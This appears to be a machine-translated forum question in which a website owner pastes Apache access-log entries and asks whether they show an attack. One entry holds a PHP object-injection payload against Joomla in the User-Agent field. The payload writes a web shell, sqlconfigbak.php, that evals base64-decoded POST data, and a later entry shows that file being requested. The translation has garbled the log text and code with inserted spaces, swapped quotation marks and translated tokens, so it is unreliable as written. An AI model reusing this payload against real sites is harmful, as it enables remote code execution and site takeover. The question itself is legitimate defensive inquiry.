我网站上的Apache访问日志条目通常是这样的:
207.46.13.174--[31 / Oct / 2016:10:18:55 +0100]“ GET / contact HTTP / 1.1” 200 256“-”“ Mozilla / 5.0(兼容; bingbot / 2.0; + http:// www .bing.com / bingbot.htm)“ 0.607小姐10.10.36.125:104 0.607
因此您可以在此处看到“用户代理”字段。但是今天我也发现user-agent字段的用法如下:
62.210.162.42--[31 / Oct / 2016:11:24:19 +0100]“ GET / HTTP / 1.1” 200399“-”“} __ test | O:21:” JDatabaseDriverMysqli“:3:{s:2 :“ fc”; O:17:“ JSimplepieFactory”:0:{} s:21:“ \ 0 \ 0 \ 0disconnectHandlers”; a:1:{i:0; a:2:{i:0; O: 9:“ SimplePie”:5:{s:8:“清理”; O:20:“ JDatabaseDriverMysql”:0:{} s:8:“ feed_url”; s:242:“ file_put_contents($ _ SERVER [” DOCUMENT_ROOT“ ] .chr(47)。“ sqlconfigbak.php”,“ | = | \ x3C” .chr(63)。“ php \ x24mujj = \ x24_POST ['z']; if(\ x24mujj!=''){\ x24xsser = base64_decode(\ x24_POST ['z0']); @ eval(\“ \\\ x24safedg = \ x24xsser; \”);}“); JFactory :: getConfig(); exit;”; s:19:“ cache_name_function“; s:6:” assert“; s:5:” cache“; b:1; s:11:” cache_class“; O:20:”JDatabaseDriverMysql“:0:{}} i:1; s:4:” init“;}} s:13:” \ 0 \ 0 \ 0connection“; b:1;}〜Ů” 0.304 BYPASS 10.10.36.125:104 0.304
这是攻击吗?下一个日志条目似乎已成功检索sqlconfigbak.php
到脚本中提到的文件(代码200)。虽然我在文件系统中找不到文件:
62.210.162.42--[31 / Oct / 2016:11:24:20 +0100]“ GET //sqlconfigbak.php HTTP / 1.1” 200399“ http://www.googlebot.com/bot.html”“ Mozilla /5.0(兼容; Googlebot / 2.1; + http://www.google.com/bot.html)” 0.244 BYPASS 10.10.36.125:104 0.244
请在这里发生什么?